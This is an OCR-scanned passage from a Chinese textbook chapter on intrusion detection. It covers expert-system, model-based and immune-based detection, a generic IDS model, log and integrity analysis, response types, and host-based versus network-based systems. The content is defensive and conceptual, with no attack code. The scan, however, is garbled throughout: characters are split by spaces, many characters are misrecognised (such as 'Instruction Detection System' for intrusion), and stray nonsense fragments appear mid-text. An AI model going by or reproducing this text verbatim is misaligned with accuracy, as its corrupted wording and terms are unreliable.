络 后 ， 该 网 络 就 形成 了 相应 的 用 户 特征 表 。 网 络 对 下 一 事件 的 预测 错误 率 在 一 定 程度 上 反 
映 了 用 户 行为 的 异常 程度 。 这 种 方法 的 优点 在 于 能 够 更 好 地 处 理 原始 数据 的 随机 特征 ， 即 
不 需要 对 这 些 数据 做 任何 统计 假设 并 有 较 好 的 抗 干扰 能 力 ， 缺 点 是 网 络 的 拓扑 结构 及 各 元 
素 的 权 值 很 难 确定 ， 命 令 窗口 的 严 值 也 很 难 选取 。 窗 口 太 大 ， 网 络 效率 降低 ， 窗 口 太 小 ， 
网 络 输出 不 理想 。 

目前 ， 神 经 网 络 技 术 提出 了 对 基于 传统 统计 技术 的 攻击 检测 方法 的 改进 方向 ， 但 尚 不 
十 分 成 熟 ， 所 以 传统 的 统计 方法 仍 继续 发 挥 作用 ， 仍 然 能 为 发 现 用 户 的 异常 行为 提供 相当 
有 参考 价值 的 信息 。 

3. 基于 专家 系统 的 检测 

安全 检测 工作 自动 化 的 另外 一 个 值得 重视 的 研究 方向 是 基于 专家 系统 的 攻击 检测 技 
术 ， 即 根据 安全 专家 对 可 疑 行为 的 分 析 经 验 来 形成 一 套 推理 规则 ， 然 后 再 在 此 基础 上 建立 
相应 的 专家 系统 。 专 家 系统 对 所 涉及 的 攻击 操作 自动 进行 分 析 工 作 。 

所 谓 专家 系统 ， 是 基于 一 套 由 专家 经 验 事先 定义 的 规则 的 推理 系统 。 例 如 ， 某 个 用 户 
在 数 分 钟 之 内 连续 进行 登录 ， 且 失败 超过 三 次 ， 专 家 系统 就 可 以 认为 是 一 种 攻击 行为 。 类 
似 的 规则 在 统计 系统 中 似乎 也 有 ， 但 要 注意 的 是 基于 规则 的 专家 系统 或 推理 系统 也 有 其 局 
限 性 , 因此 作为 这 类 系统 的 基础 推理 规则 一 般 都 是 根据 已 知 的 安全 漏洞 进行 安排 和 策划 的 ， 
而 对 系统 的 最 危险 的 威胁 则 主要 来 自 未 知 的 安全 漏洞 。 实 现 基于 规则 的 专家 系统 是 一 个 知 
识 工程 问题 ， 而 且 其 功能 应 当 能 够 随 着 经 验 的 积累 而 利用 其 自学 能 力 进行 规则 的 扩充 和 修 
正 。 当 然 ， 这 种 能 力 需要 在 专家 的 指导 和 参与 下 才能 实现 ， 否 则 可 能 会 导致 较 多 的 错误 。 
一 方面 ， 推 理 机 制 使 得 系统 面 对 一 些 新 的 行为 现象 时 可 能 具备 一 定 的 应 对 能 力 ( 即 有 可 能 
发 现 一 些 新 的 安全 漏洞 ); 另 一 方面 ,攻击 行为 也 可 能 不 会 触发 任何 一 个 规则 ， 从 而 被 检测 
到 。 专 家 系统 对 历史 数据 的 依赖 性 总 的 来 说 比 基 于 统计 技术 的 审计 系统 少 ， 因 此 系统 的 适 
应 性 比较 强 ， 可 以 较 灵 活 地 适应 广泛 的 安全 策略 和 检测 需求 。 但 迄今 ， 推 理 系统 和 谓词 演 
算 的 可 计算 问题 还 未 得 到 很 好 的 解决 。 

在 具体 实现 过 程 中 ， 专 家 系统 主要 面临 的 问题 有 以 下 两 种 。 11 


入 和 你 擒 测 


克 参 颁 会 扩大 理论 与 笑 夏 


(1) 全 面 性 问题 : 很 难 从 各 种 入 侵 检测 手段 中 抽象 出 全 面 的 规则 化 知识 。 

(2) 效率 问题 : 需要 处 理 的 数据 量 过 大 ， 而 且 在 大 型 系统 上 很 难 获 得 实时 、 连 续 的 审 
计数 据 。 

4. 基于 模型 推理 的 检测 

攻击 者 在 攻击 一 个 系统 时 往往 采用 一 定 的 行为 程序 ， 如 猜测 口令 的 程序 ， 这 种 行为 程 
序 构成 了 某 种 具有 一 定 行为 特征 的 模型 ， 根 据 这 种 模型 所 代表 的 攻击 意图 的 行为 特征 ， 可 
以 实时 地 检测 出 恶意 的 攻击 企图 。 用 基于 模型 的 推理 方法 ， 人 们 能 够 为 某 些 行为 建立 特定 
的 模型 ， 从 而 能 够 监视 具有 特定 行为 特征 的 某 些 活动 。 根 据 假 设 的 攻击 脚本 ， 这 种 系统 就 
E 够 检测 出 非法 的 用 户 行为 。 为 了 准确 判断 ， 一 般 要 为 不 同 的 攻击 者 和 不 同 的 系统 建立 特 
定 的 攻击 脚本 。 

当 有 证 据 表明 某 种 特定 的 攻击 发 生 时 ， 系 统 应 收集 其 他 证 据 来 证 实 或 否定 攻击 的 真实 
性 ， 既 不 能 漏 报 攻击 对 信息 系统 造成 实际 损害 ， 又 能 尽 可 能 避免 错 报 。 

当然 ， 上 述 几 种 方法 都 不 能 彻底 解决 攻击 检测 问题 ， 所 以 最 好 是 综合 地 利用 各 种 手段 
强化 计算 机 信息 系统 的 安全 程序 ， 以 增加 攻击 成 功 的 难度 ， 同 时 根据 系统 本 身 的 特点 选择 
适合 的 攻击 检测 手段 。 

S.， 基于 免疫 的 检测 

基于 免疫 的 检测 技术 是 将 自然 免疫 系统 的 某 些 特征 运用 到 网 络 系统 中 ， 使 整个 系统 具 
有 适应 性 、 自 我 调节 性 、 可 扩展 性 。 人 的 免疫 系统 成 功 地 保护 人 体 不 受 各 种 抗原 和 组 织 的 
侵害 ， 这 个 重要 特征 吸引 了 许多 计算 机 安全 专家 和 人 工 智能 专家 。 通 过 学 习 免 疫 专家 的 研 
究 成 果 ， 计 算 机 专家 提出 了 计算 机 免疫 系统 。 在 许多 传统 的 网 络 安全 系统 中 ， 每 个 目标 都 
将 它 的 系统 日 志和 收集 到 的 信息 传送 给 相应 的 服务 器 ， 由 服务 器 分 析 整 个 日 志和 信息 ， 判 
断 是 否 发 生 恶意 入 侵 。 基 于 免疫 的 入 侵 检测 系统 运用 计算 免疫 的 多 层 性 、 分 布 性 、 多 样 性 
等 特性 设置 动态 代理 ， 实 施 分 层 检 测 和 响应 机 制 。 

6. 入 侵 检测 的 新 技术 

数据 挖掘 技术 被 Wenke.lee 用 在 了 入 侵 检测 中 。 用 数据 挖掘 程序 处 理 搜集 到 的 审计 数 
据 ， 为 各 种 入 侵 行为 和 正常 操作 建立 精确 的 行为 模式 ， 这 个 过 程 是 一 个 自动 过 程 ， 不 需要 
人 工分 析 和 编码 入 侵 模 式 。 移 动 代理 用 于 入 侵 检测 中 ， 具 有 应 对 主机 间 动 态 迁移 、 一 定 的 
智能 性 、 与 平台 无 关 性 、 分 布 的 灵活 性 、 低 网 络 数据 流量 和 多 代理 合作 特性 。 移 动 代理 技 
术 适 用 于 大 规模 信息 搜集 和 动态 处 理 ， 在 入 侵 检测 系统 中 采用 该 技术 ， 可 以 提高 入 侵 检 测 
系统 的 性 能 。 

7， 其 他 相关 问题 

为 了 防止 过 多 的 不 相干 信息 的 干扰 ， 用 于 安全 目的 的 攻击 检测 系统 在 审计 系统 之 外 ， 
还 要 配备 适合 系统 安全 策略 的 信息 采集 器 或 过 滤器 。 同 时 ， 除 了 依靠 来 自 审计 子 系统 的 信 
息 , 还 应 当 充分 利用 来 自 其 他 信息 源 的 信息 。 在 某 些 系统 内 可 以 在 不 同 层次 进行 审计 跟踪 。 
例如 ， 有 些 系统 的 安全 机 制 采用 三 级 审计 跟踪 ， 包 括 审计 操作 系统 核心 调用 行为 、 审 计 用 
户 和 操作 系统 界面 级 行为 和 审计 应 用 程序 内 部 行为 。 

另 一 个 重要 问题 是 决定 入 侵 检测 系统 的 运行 位 置 。 为 了 提高 入 侵 检测 系统 的 运行 效 
率 ， 可 以 安排 在 与 被 监视 系统 独立 的 计算 机 上 执行 审计 跟踪 分 析 和 攻击 性 检测 。 因 为 监视 
系统 的 响应 时 间 对 被 监视 系统 的 运行 完全 没有 负面 影响 ， 也 不 会 因为 其 他 安全 有 关 的 因素 


而 受到 影响 ， 这 样 做 既 提 高 了 效率 ， 又 保证 了 安全 性 。 

总 之 ， 为 了 有 效 地 利用 审计 系统 提供 的 信息 ， 通 过 攻击 检测 措施 防范 攻击 威胁 ， 计 算 
机 安全 系统 应 当 根据 系统 的 具体 条 件 选择 适用 的 主要 攻击 检测 方法 ， 并 且 有 机 地 融合 其 他 
可 选用 的 攻击 检测 方法 。 同 是 ， 我 们 应 当 清 醒 地 认识 到 ， 任 何 一 种 攻击 检测 措施 都 不 能 一 
劳 永 逸 ， 必 须 配备 有 效 的 管理 和 组 织 措施 。 

人 们 对 于 安全 技术 的 要 求 将 越 来 越 高 。 这 种 需求 也 刺激 着 攻击 检测 技术 和 其 理论 研究 
向 前 发 展 ， 同 时 也 必 将 促进 实际 安全 产品 的 进一步 发 展 。 


11.3 入侵 检测 系统 


入 侵 检 测 系 统 (Instruction Detection System，IDS) 是 一 种 对 网 络 传输 进行 即时 监视 ， 
在 发 现 可 疑 传输 时 发 出 警报 或 者 采取 主动 反应 措施 的 网 络 安全 设备 。 它 与 其 他 网 络 安全 设 
备 的 不 同 之 处 在 于 ，IDS 是 一 种 积极 主动 的 安全 防护 技术 。 IDS 最 早出 现在 1980 年 4 月 。 
1980 年 代 中 期 ,IDS 逐渐 发 展 成 为 入 侵 检 测 专家 系统 (IDES)。 1990 年 ，IDS 分 化 为 基于 
网 络 的 IDS 和 基于 主机 的 IDS。 后 又 出 现 分 布 式 IDS。 目 前 ，IDS 发 展 迅 速 ， 已 有 人 宣称 
IDS 可 以 完全 取代 防火 墙 。 


11.3.1 入 侵 检 测 系统 模 型 


所 有 能 够 执行 入 侵 检测 任务 和 实现 入 侵 检测 功能 的 系统 都 可 称 为 入 侵 检测 系统 ， 其 中 
包括 软件 系统 或 软 、 硬 件 结合 的 系统 。 一 个 通用 的 入 侵 检测 系统 模型 如 图 11-5 所 示 。 


知识 库 
sl a 
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目标 系统 


图 11-5 通用 的 入 侵 检测 系统 模型 


在 图 11-5 中 ， 通 用 入 侵 检 测 系统 模型 主要 由 4 个 部 分 组 成 。 

(1) 数据 收集 器 (又 称 探测 器 )。 主 要 负责 收集 数据 ， 探 测 器 的 输入 数据 流 包括 任何 
可 能 包含 入 侵 行 为 线索 的 系统 数据 ， 如 各 种 网 络 协议 数据 包 、 系 统 日 志文 件 和 系统 调用 记 
录 等 。 探 测 器 将 这 些 数据 收集 起 来 ， 然 后 再 发 送 到 检测 器 进行 处 理 。 

(2) 检测 器 (又 称 分 析 器 或 检测 引擎 )。 负 责 分 析 和 检测 入 侵 的 任务 ， 并 向 控制 器 发 
出 警报 信号 。 

(3) 知识 库 。 为 检测 器 和 控制 器 提供 必需 的 数据 信息 支持 。 这 些 信息 包括 用 户 历史 活 | 第 
动 档案 或 检测 规则 集合 等 。 11 
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(4) 控制 器 。 根 据 从 检测 器 发 来 的 警报 信号 ， 人 工 或 自动 地 对 入 侵 行 为 做 出 响应 。 
此 外 ， 大 多 数 入 侵 检测 系统 都 会 包含 一 个 用 户 接口 组 件 ， 用 于 观察 系统 的 运行 状态 和 
输出 信号 ， 并 对 系统 的 行为 进行 控制 。 


11.3.2 入侵 检测 的 过 程 


1. 人 入侵 信息 的 收集 

入 侵 检测 的 第 一 步 是 信息 收集 ， 收 集 的 内 容 包 括 系统 、 网 络 、 数 据 及 用 户 活 动 的 状态 
和 行为 。 通 常 需要 在 计算 机 网 络 系统 中 的 若干 不 同 关 键 点 〈 不 同 网 段 和 不 同 主机 ) 收集 信 
息 ， 这 除了 尽 可 能 扩大 检测 范围 的 因素 外 ， 还 有 一 个 重要 的 因素 就 是 从 一 个 源 来 的 信息 有 
可 能 看 不 出 疑点 ， 但 从 几 个 源 来 的 信息 的 不 一 致 性 却 是 可 疑 行为 或 入 侵 的 最 好 标识 。 

入 侵 检测 很 大 程度 上 依赖 于 收集 信息 的 可 靠 性 和 正确 性 ， 因 此 ， 有 必要 利用 所 知道 的 
真正 的 和 精确 的 软件 来 报告 这 些 信 息 。 因 为 入 侵 者 经 常 蔡 换 软件 以 搞 混和 移 走 这 些 信息 ， 
例如 替换 被 程序 调用 的 子 程序 、 库 和 其 他 工具 。 入 侵 者 对 系统 的 修改 可 能 使 系统 功能 失常 
而 看 起 来 跟 正 常 的 一 样 。 这 需要 保证 用 来 检测 网 络 系统 的 软件 的 完整 性 ， 特 别 是 入 侵 检测 
系统 软件 本 身 应 具有 相当 强 的 坚固 性 ， 防 止 被 算 改 而 收集 到 错误 的 信息 。 

入 侵 检测 利用 的 信息 一 般 来 自 以 下 4 个 方面 。 

(1) 系统 和 网 络 日 志 。 

如 果 不 知道 入 侵 者 在 系统 上 都 做 了 什么 ， 那 是 不 可 能 发 现 入 侵 的 。 日 志 提 供 了 当前 系 

统 的 细节 ， 哪 些 系统 被 攻击 了 ， 哪 些 系统 被 攻破 了 。 因 此 ， 充 分 利用 系统 和 网 络 日 志文 件 
信息 是 检测 入 侵 的 必要 条 件 。 日 志 中 包含 发 生 在 系统 和 网 络 上 的 不 寻常 和 不 期 望 活动 的 证 
据 ， 这 些 证 据 可 以 指出 有 人 正在 入 侵 或 已 成 功 入 侵 了 系统 。 通 过 查看 日 志文 件 ， 能 够 发 现 
成 功 的 入 侵 或 入 侵 企图 ， 并 很 快 地 启动 相应 的 应 急 响 应 程序 。 日 志文 件 中 记录 了 各 种 行为 
类 型 ， 每 种 类 型 又 包含 不 同 的 信息 ， 例 如 记录 “用 户 活动 ”类 型 的 日 志 ， 就 包含 登录 、 用 
户 了 DP 改变、 用 户 对 文件 的 访问 、 授 权 和 认证 信息 等 内 容 。 很 显然 地 ， 对 用 户 活动 来 讲 ， 
不 正常 的 或 不 期 望 的 行为 就 是 重复 登录 失败 、 登 录 到 不 期 望 的 位 置 以 及 非 授权 的 企图 访问 
重要 文件 等 。 
于 日 志 的 重要 性 , 所 有 重要 的 系统 都 应 定期 做 日 志 , 而 且 日 志 应 被 定期 保 在 和 备份 ， 
因为 不 知 何 时 会 需要 它 。 许 多 专家 建议 定期 向 一 个 中 央 日 志 服务 器 上 发 送 所 有 日 志 ， 而 这 
个 服务 器 使 用 一 次 性 写 入 的 介质 来 保存 数据 ， 这 样 就 避免 了 攻击 者 算 改 日 志 。 系 统 本 地 日 
志 与 发 到 一 个 远 端 系统 保存 的 日 志 提供 了 宛 余 和 一 个 额外 的 安全 保护 层 。 现 在 两 个 日 志 可 
以 互相 比较 ， 任 何 的 不 同 显 示 了 系统 的 异常 。 

(2) 目录 和 文件 中 的 不 期 望 的 改变 。 

网 络 环境 中 的 文件 系统 包含 很 多 软件 和 数据 文件 ， 包 含 重要 信息 的 文件 和 私有 数据 文 
件 经 常 是 攻击 者 修改 或 破坏 的 目标 。 目 录 和 文件 中 的 不 期 望 的 改变 〈 包 括 修改 、 创 建 和 删 
除 )， 特 别 是 那些 正常 情况 下 限制 访问 的 ， 很 可 能 就 是 一 种 入 侵 产生 的 指示 和 信和 号。 攻击 者 
经 常 替换 、 修 改 和 破坏 他 们 获得 访问 权 的 系统 上 的 文件 ， 同 时 为 了 隐藏 系统 中 他 们 的 表现 
及 活动 痕迹 ， 都 会 尽力 去 蔡 换 系统 程序 或 修改 系统 日 志文 件 。 

(3) 程序 执行 中 的 不 期 望 行为 。 

网 络 系统 上 的 程序 执行 一 般 包 括 操作 系统 、 网 络 服务 、 用 户 启动 的 程序 和 特定 目的 的 


应 用 ， 例 如 数据 库 服务 器 。 每 个 在 系统 上 执行 的 程序 由 一 到 多 个 进程 来 实现 。 每 个 进程 执 
行 在 具有 不 同 权限 的 环境 中 , 这 种 环境 控制 着 进程 可 访问 的 系统 资源 、 程序 和 数据 文件 等 。 
一 个 进程 的 执行 行为 由 它 运行 时 执行 的 操作 来 表现 ， 操 作 执 行 的 方式 不 同 ， 它 利用 的 系统 
资源 也 就 不 同 。 操 作 包 括 计 算 、 文 件 传 输 、 设 备 和 其 他 进程 ， 以 及 与 网 络 间 其 他 进程 的 
通信 。 

一 个 进程 出 现 了 不 期 望 的 行为 可 能 表明 攻击 者 正在 入 侵 系 统 。 攻 击 者 可 能 会 将 程序 或 
服务 的 运行 分 解 ， 从 而 导致 它 失败 ， 或 者 是 以 非 用 户 或 管理 员 意 图 的 方式 操作 。 

(4) 物理 形式 的 入 侵 信息 。 

这 包括 两 个 方面 的 内 容 ， 一 是 未 授权 的 对 网 络 硬 件 连接 ， 二 是 对 物理 资源 的 未 授权 访 
问 。 入 侵 者 会 想方设法 去 突破 网 络 的 周边 防卫 ， 如 果 他 们 能 够 在 物理 上 访问 内 部 网 ， 就 能 
安装 他 们 自己 的 设备 和 软件 。 依 此 ， 入 侵 者 就 可 以 知道 网 上 的 由 用 户 加 上 去 的 不 安全 (未 
授权 ) 设备 ， 然 后 利用 这 些 设备 访问 网 络 。 

2. 信号 分 析 

对 上 述 4 类 收集 到 的 有 关系 统 、 网 络 、 数 据 及 用 户 活 动 的 状态 和 行为 等 信息 ， 一 般 通 
过 三 种 技术 手段 进行 分 析 : 模式 匹配 、 统 计 分 析 和 完整 性 分 析 。 其 中 前 两 种 方法 用 于 实时 
的 入 侵 检测 ， 而 完整 性 分 析 则 用 于 事后 分 析 。 

1) 模式 匹配 

模式 匹配 就 是 将 收集 到 的 信息 与 已 知 的 网 络 入 侵 和 系统 误 用 模式 数据 库 进 行 比 较 ， 从 
而 发 现 违背 安全 策略 的 行为 。 该 过 程 可 以 很 简单 〈 如 通过 字符 串 匹 配 以 寻找 一 个 简单 的 条 
目 或 指令 )， 也 可 以 很 复杂 (如 利用 正规 的 数学 表达 式 来 表示 安全 状态 的 变化 )。 一 般 来 讲 ， 
一 种 进攻 模式 可 以 用 一 个 过 程 〈 如 执行 一 条 指令 ) 或 一 个 输出 〈 如 获得 权限 ) 来 表示 。 该 
方法 的 一 大 优点 是 只 需 收 集 相 关 的 数据 集合 ， 显 著 减 少 系 统 负担 ， 且 技术 已 相当 成 熟 。 它 
与 病毒 防火 墙 采用 的 方法 一 样 ， 检 测 准确 率 和 效率 都 相当 高 。 但 是 ， 该 方法 存在 的 弱点 是 
需要 不 断 的 升级 以 对 付 不 断 出 现 的 黑客 攻击 手法 ,不 能 检测 到 从 未 出 现 过 的 黑客 攻击 手段 。 

2) 统计 分 析 

统计 分 析 方 法 首先 给 系统 对 象 〈 如 用 户 、 文 件 、 目 录 和 设备 等 ) 创建 一 个 统计 描述 ， 
统计 正常 使 用 时 的 一 些 测量 属性 (如 访问 次 数 、 操 作 失 败 次 数 和 延 时 等 )。 测量 属性 的 平均 
值 将 被 用 来 与 网 络 、 系 统 的 行为 进行 比较 ， 任 何 观察 值 在 正常 值 范围 之 外 时 ， 就 认为 有 入 
侵 发 生 。 例 如 ， 统 计 分 析 可 能 标识 一 个 不 正常 行为 ， 因 为 它 发 现 一 个 在 晚 8 点 至 早 6 点 不 
登录 的 账户 却 在 凌晨 两 点 试图 登录 。 其 优点 是 可 检测 到 未 知 的 入 侵 和 更 为 复杂 的 入 侵 ， 缺 
点 是 误 报 、 漏 报 率 高 ， 且 不 适应 用 户 正常 行为 的 突然 改变 。 有 具体 的 统计 分 析 方法 如 基于 专 


家 系统 的 、 基 于 模型 推理 的 和 基于 神经 网 络 的 分 析 方 法 ， 目 前 正 处 于 研究 热点 和 迅速 发 展 
之 中 。 
3) 完整 性 分 析 


完整 性 分 析 主 要 关注 某 个 文件 或 对 象 是 否 被 更 改 ， 这 经 常 包括 文件 和 目录 的 内 容 及 属 
性 ， 它 在 发 现 被 更 改 的 、 应 用 程序 方面 特别 有 效 。 完 整 性 分 析 使 用 消息 摘要 函数 〈 例 如 
MD5)， 它 能 识别 哪怕 是 微小 的 变化 。 其 优点 是 不 管 模式 匹配 方法 和 统计 分 析 方法 能 和 否 发 
现 入 侵 ， 只 要 是 成 功 的 攻击 导致 了 文件 或 其 他 对 象 的 任何 改变 ， 它 都 能 够 发 现 。 缺 点 是 一 
般 以 批 处 理 方式 实现 ， 不 用 于 实时 响应 。 尽 管 如 此 ， 完 整 性 检测 方法 还 应 该 是 网 络 安全 产 
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品 的 必要 手段 之 一 。 例 如 ， 可 以 在 每 一 天 的 某 个 特定 时 间 内 开启 完整 性 分 析 模 块 ， 对 网 络 
系统 进行 全 面 的 扫描 检查 。 

3. 入 侵 检测 响应 方式 

入 侵 检测 响应 方式 分 为 主动 响应 和 被 动 响应 。 

被 动 响应 型 系统 只 会 发 出 告警 通知 ， 将 发 生 的 不 正常 情况 报告 给 管理 员 ， 本 身 并 不 试 
图 降低 所 造成 的 破坏 ， 更 不 会 主动 地 对 攻击 者 采取 反击 行动 。 
主动 响应 型 系统 可 以 分 为 对 被 攻击 系统 实施 控制 和 对 攻击 系统 实施 控制 的 系统 。 

对 被 攻击 系统 实施 控制 (防护 )。 它 通过 调整 被 攻击 系统 的 状态 ， 阻 止 或 减轻 医 
响 ， 例 如 断 开 网 络 连 接 、 增 加 安全 日 志 、 杀 死 可 疑 进程 等 。 

对 攻击 系统 实施 控制 (反击 )。 这 种 系统 多 被 军 方 所 重视 和 采用 。 

目前 ， 主 动 响应 型 系统 还 比较 少 ， 即 使 做 出 主动 响应 ， 一 般 也 都 是 断 开 可 疑 攻 击 的 网 
络 连 接 ， 或 是 阻塞 可 疑 的 系统 调用 ， 若 失败 ， 则 终止 该 进程 。 但 由 于 系统 暴露 于 拒绝 服务 
攻击 下 ， 这 种 防御 一 般 也 难以 实施 。 


11.3.3 ”入侵 检测 系统 分 类 


1. 基于 主机 的 入 侵 检测 系统 

基于 主机 的 入 侵 检测 系统 在 主机 或 操作 系统 上 检查 有 关 信 息 来 探测 入 侵 行为 。 这 种 入 
侵 检 测 系统 通过 系统 调用 、 审 计 日 志和 错误 信息 等 对 主机 进行 分 析 。 一 个 典型 的 基于 主机 
的 入 侵 检测 系统 部 署 如 图 11-6 所 示 。 
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图 11-6 ”基于 主机 的 入 侵 检 测 系统 部 署 


基于 主机 的 入 侵 检测 系统 (HIDS) 通常 是 安装 在 被 重点 检测 的 主机 之 上 ， 主 要 是 对 该 
主机 的 网 络 实时 连接 以 及 系统 审计 日 志 进 行 智能 分 析 和 判断 。 如 果 其 中 主体 活动 十 分 可 疑 
(特征 或 违反 统计 规律 )， 入 侵 检 测 系统 就 会 采取 相应 措施 。 


基于 主机 的 IDS 使 用 验证 记录 ， 并 发 展 了 精密 的 可 迅速 做 出 响应 的 检测 技术 。 通 常 ， 
基于 主机 的 IDS 可 监 探 系统 、 事 件 和 Windows NT 下 的 安全 记录 以 及 UNIX 环境 下 的 系统 
记录 。 当 有 文件 发 生变 化 时 ，IDS 将 新 的 记录 条 目 与 攻击 标记 相 比 较 ， 看 它们 是 否 匹 配 。 
如 果 匹 配 ， 系 统 就 会 向 管理 员 报 警 并 向 别 的 目标 报告 ， 以 采取 措施 。 

基于 主机 的 IDS 在 发 展 过 程 中 融入 了 其 他 技术 。 对 关键 系统 文件 和 可 执行 文件 的 入 侵 
检测 的 一 个 常用 方法 ， 是 通过 定期 检查 校 验 和 来 进行 的 ， 以 便 发 现 意外 的 变化 。 反 应 的 快 
慢 与 轮 询 间隔 的 频率 有 直接 的 关系 。 最 后 ， 许 多 系统 都 是 监听 端口 的 活动 ， 并 在 特定 端口 
被 访问 时 向 管理 员 报警 。 这 类 检测 方法 将 基于 网 络 的 入 侵 检测 的 基本 方法 融入 到 基于 主机 
的 检测 环境 中 。 

尽管 基于 主机 的 入 侵 检查 系统 不 如 基于 网 络 的 入 侵 检查 系统 快捷 ， 但 它 确实 具有 基于 
网 络 的 系统 无 法 比拟 的 优点 。 这 些 优点 包括 : 更 好 的 辨识 分 析 、 对 特殊 主机 事件 的 紧密 关 
注 及 低廉 的 成 本 。 基 于 主机 的 入 侵 侦查 系统 包括 以 下 功能 。 

(1) 确定 攻击 是 否 成 功 。 由 于 基于 主机 的 IDS 使 用 含有 已 发 生 事件 的 信息 ， 它 们 可 以 
比 基 于 网 络 的 IDS 更 加 准确 地 判断 攻击 是 否 成 功 。 在 这 方面 ,基于 主机 的 IDS 是 基于 网 络 
的 IDS 完美 补充 ， 网 络 部 分 可 以 尽早 提供 警告 ， 主 机 部 分 可 以 确定 攻击 成 功 与 否 。 

(2) 监视 特定 的 系统 活动 。 基 于 主机 的 IDS 监视 用 户 和 访问 文件 的 活动 ， 包 括 文件 访 
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的 IDS 可 以 监督 所 有 用 户 的 登录 及 上 网 情况 ， 以 及 每 位 用 户 在 连接 到 网 络 以 后 的 行为 。 
于 基于 网 络 的 系统 要 做 到 这 个 程度 是 非常 困难 的 。 基 于 主机 技术 还 可 监视 只 de 
et opal ptt ga 
改动 一 旦 发 生 ， 基 于 主机 的 IDS 就 能 检测 到 这 种 不 适当 的 改动 。 基 于 主机 的 IDS 还 可 审计 
能 影响 系统 记录 的 校 验 措施 的 改变 。 基 于 主机 的 系统 可 以 监视 主要 系统 文件 和 可 执行 文件 
的 改变 。 系 统 能 够 查 出 那些 欲 改写 重要 系统 文件 或 者 安装 特洛伊 木马 或 后 门 的 尝试 并 将 它 
们 中 断 。 而 基于 网 络 的 系统 有 时 会 查 不 到 这 些 行为 。 

(3) 能 够 检查 到 基于 网 络 的 系统 检查 不 出 的 攻击 。 基 于 主机 的 系统 可 以 检测 到 那些 基 
于 网 络 的 系统 察觉 不 到 的 攻击 。 例 如 ， 来 自主 要 服务 器 键盘 的 攻击 不 经 过 网 络 ， 所 以 可 以 
躲 开 基 于 网 络 的 入 侵 检测 系统 。 

(4) 适用 于 被 加 密 的 和 交换 的 环境 。 交 换 设备 可 将 大 型 网 络 分 成 许多 的 小 型 网 络 部 件 
加 以 管理 ， 所 以 从 杭 盖 足 够 大 的 网 络 范围 的 角度 出 发 ， 很 难 确定 配置 基于 网 络 的 IDS 的 最 
佳 位 置 。 业 务 映射 和 交换 机 上 的 管理 端口 有 助 于 此 ， 但 这 些 技术 有 时 并 不 适用 。 基 于 主机 
的 入 侵 检测 系统 可 安装 在 所 需 的 重要 主机 上 ， 在 交换 的 环境 中 具有 更 高 的 能 见 度 。 某 些 加 
密 方式 也 向 基于 网 络 的 入 侵 检测 发 出 了 挑战 。 由 于 加 密 方 式 位 于 协议 堆栈 内 ， 所 以 基于 网 
络 的 系统 可 能 对 某 些 攻击 没有 反应 ， 基 于 主机 的 IDS 没有 这 方面 的 限制 ， 当 操作 系统 及 基 
于 主机 的 系统 看 到 即将 到 来 的 业务 时 ， 数 据 流 已 经 被 解密 了 。 

(5) 近 于 实时 的 检测 和 响应 。 尽 管 基于 主机 的 入 侵 检测 系统 不 能 提供 真正 实时 的 反 
应 ， 但 如 果 应 用 正确 ， 反 应 速度 可 以 非常 接近 实时 。 老 式 系统 利用 一 个 进程 在 预先 定义 的 
间隔 内 检查 登记 文件 的 状态 和 内 容 ， 与 老式 系统 不 同 ， 在 当前 采用 基于 主机 的 系统 的 中 断 
指令 的 情况 下 ， 这 种 新 的 记录 可 被 立即 处 理 ， 显 著 减 少 了 从 攻击 验证 到 做 出 响应 的 时 间 ， 
在 从 操作 系统 做 出 记录 到 基于 主机 的 系统 得 到 辨识 结果 之 间 的 这 段 时 间 是 一 段 延迟 , 但 大 | 11 
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多 数 情况 下 ， 在 破坏 发 生 之 前 ， 系 统 就 能 发 现 入 侵 者 ， 并 中 止 他 的 攻击 。 

(6) 不 要 求 额外 的 硬件 设备 。 基 于 主机 的 入 侵 检测 系统 存在 于 现行 网 络 结构 之 中 ， 包 
括 文件 服务 器 ，Web 服务 器 及 其 他 共享 资源 。 这 些 使 得 基于 主机 的 系统 效率 很 高 。 因 为 它 
们 不 需要 在 网 络 上 另外 安装 登记 、 维 护 及 管理 硬件 设备 。 

(7) 记录 花费 更 加 低廉 。 基 于 网 络 的 入 侵 检 测 系统 比 基 于 主机 的 入 侵 检测 系统 要 昂贵 

得 多 。 
基于 主机 的 入 侵 检测 系统 有 如 下 的 弱点 。 
(1) 主机 入 侵 检测 系统 安装 在 需要 保护 的 设备 上 ， 如 当 一 个 数据 库 服务 器 要 保护 时 ， 
就 要 在 服务 器 本 身上 安装 入 侵 检测 系统 。 这 会 降低 应 用 系统 的 效率 。 此 外 ， 它 也 会 带 来 一 
些 额外 的 安全 问题 ， 安 装 了 主机 入 侵 检测 系统 后 ， 将 本 不 允许 安全 管理 员 访问 的 服务 器 变 
成 他 可 以 访问 的 了 。 

(2) 主机 入 侵 检 测 系统 依赖 于 服务 器 固有 的 日 志 与 监视 能 力 。 如 果 服 务 器 没有 配置 日 
志 功 能 ， 则 必须 重新 配置 ， 这 将 会 给 运行 中 的 业务 系统 带 来 不 可 预见 的 性 能 影响 。 

(3) 全 面部 署 主机 入 侵 检测 系统 代价 较 大 ， 企 业 中 很 难 将 所 有 主机 用 主机 入 侵 检 测 系 
统 保护 , 只 能 选择 部 分 主机 保护 。 那些 未 安装 主机 入 侵 检测 系统 的 机 器 将 成 为 保护 的 盲点 ， 
入 侵 者 可 利用 这 些 机 器 达到 攻击 目标 。 

(4) 主机 入 侵 检测 系统 除了 监测 自身 的 主机 以 外 ， 根 本 不 监测 网 络 上 的 情况 。 对 入 侵 
行为 的 分 析 的 工作 量 将 随 着 主机 数目 增加 而 增加 。 

2. 基于 网 络 的 入 侵 检测 系统 

基于 网 络 的 入 侵 检测 系统 对 数据 包 进 行 分 析 以 探测 针对 网 络 的 攻击 。 这 种 入 侵 检测 系 
统 嗅 探 网 络 数据 包 ， 并 将 数据 流 与 已 知 入 侵 行 为 的 特征 进行 比较 。 一 个 典型 的 基于 网 络 的 
入 侵 检测 系统 部 署 如 图 11-7 所 示 。 


控制 器 


探测 器 


不 可 信赖 的 


图 11-7 基于 网 络 的 入 侵 检 测 系统 部 署 


基于 网 络 的 入 侵 检测 系统 使 用 原始 网 络 包 作为 数据 源 。 基 于 网 络 的 IDS 通常 利用 一 个 
运行 在 随机 模式 下 的 网 络 适配器 来 实时 监视 并 分 析 通 过 网 络 的 所 有 通信 业务 。 它 的 攻击 辨 
